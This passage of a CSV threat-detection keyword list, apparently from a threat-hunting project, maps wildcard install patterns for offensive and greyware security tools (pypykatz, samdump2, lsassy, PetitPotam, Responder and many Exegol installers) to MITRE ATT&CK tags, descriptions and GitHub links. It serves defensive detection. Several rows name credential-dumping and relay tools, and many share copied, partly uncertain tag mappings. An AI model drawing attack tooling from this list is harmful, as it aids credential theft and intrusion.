Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*install Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*install macchanger*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*install p0f*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*install pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*install proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*install pyinstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python 
application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*install pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*install samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. 
List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install snmpcheck*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*install tor deb.torproject.org-keyring*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*install tshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*install udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*install_aclpwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ad_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*install_adidnsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_amber*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-import*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-quickwin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_certipy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_certsync*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_coercer*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_crackhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - 
T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_cracking_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_crackmapexec*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_cypheroth*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_darkarmour*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_dfscoerce*","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_donpapi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_enum4linux-ng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_evilwinrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*install_finduncommonshares*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gmsadumper*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_goldencopy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gosecretsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gpp-decrypt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_hashonymize*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_impacket*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_keepwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_kerbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldaprelayscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldapsearch-ad*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_lnkup*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_lsassy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_manspider*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_mitm6_pip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_noPac*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*install_oaburl*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_PassTheCert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pcredz*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_petitpotam*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pkinittools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_privexchange*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pth-tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pygpoabuse*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pykek*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pylaps*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pypykatz*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pywhisker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pywsus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_responder*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with 
